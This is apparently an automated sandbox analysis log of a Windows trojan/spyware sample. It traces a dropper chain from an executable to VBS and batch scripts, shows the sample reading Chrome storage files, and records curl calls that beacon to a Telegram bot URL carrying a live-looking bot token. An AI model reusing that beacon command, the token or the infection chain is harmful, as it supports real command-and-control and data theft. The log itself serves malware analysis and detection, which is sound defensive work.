Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.winEXE@14/3@2/3
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABB6F0 GetLastError,FormatMessageW,LocalFree, 4_2_00007FF7B0ABB6F0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD8284 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 4_2_00007FF7B0AD8284
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe File created: C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Virustotal: Detection: 27%
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectory\ (((((
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: tmp.vbs, 00000004.00000000.1510729864.00007FF7B0AF8000.00000002.00000001.01000000.00000004.sdmp, tmp.vbs, 00000004.00000003.1512748177.00000263F2900000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs, 00000004.00000002.1533810636.00007FF7B0AF8000.00000002.00000001.01000000.00000004.sdmp, tmp.vbs, 00000004.00000003.1512346232.00000263F2009000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs.0.dr
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327CA18 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,strlen,malloc,GetSystemDirectoryA,strlen,strcpy,strlen,strcpy,LoadLibraryA,free, 0_2_00007FF7B327CA18
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6820156
Source: tmp.vbs.0.dr Static PE information: section name: .didat
Source: tmp.vbs.0.dr Static PE information: section name: _RDATA
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF4D00 pushfq ; iretd 4_2_00007FF7B0AF4D01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe File created: C:\Users\user\AppData\Local\Temp\tmp.vbs

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49707
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe API coverage: 6.3 %
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329A438 FindClose,abort,FindFirstFileExW,GetLastError, 0_2_00007FF7B329A438
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329A4AC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 0_2_00007FF7B329A4AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ADADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0ADADF0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0AC40CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AEF900 FindFirstFileExA, 4_2_00007FF7B0AEF900
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE1304 VirtualQuery,GetSystemInfo, 4_2_00007FF7B0AE1304
Source: curl.exe, 00000008.00000003.1533122404.000001FB15815000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy8
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329B5B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B329B5B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327CA18 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,strlen,malloc,GetSystemDirectoryA,strlen,strcpy,strlen,strcpy,LoadLibraryA,free, 0_2_00007FF7B327CA18
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF0980 GetProcessHeap, 4_2_00007FF7B0AF0980
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329B2E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7B329B2E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329B798 SetUnhandledExceptionFilter, 0_2_00007FF7B329B798
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329B5B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B329B5B8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE2170 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FF7B0AE2170
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE7338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF7B0AE7338
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE2DD0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF7B0AE2DD0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE2FB4 SetUnhandledExceptionFilter, 4_2_00007FF7B0AE2FB4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ADADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0ADADF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF5540 cpuid 4_2_00007FF7B0AF5540
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: GetLocaleInfoEx,FormatMessageA, 0_2_00007FF7B329A04C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: GetLocaleInfoW,GetNumberFormatW, 4_2_00007FF7B0AD9F2C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329B804 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF7B329B804
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC4C24 GetVersionExW, 4_2_00007FF7B0AC4C24
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3292524 socket,memset,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 0_2_00007FF7B3292524
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327BBA0 memset,strlen,memset,strlen,strncmp,strlen,strlen,strncmp,strlen,inet_pton,htons,inet_pton,htons,htons,bind,htons,bind,memset,getsockname,WSAGetLastError,WSAGetLastError, 0_2_00007FF7B327BBA0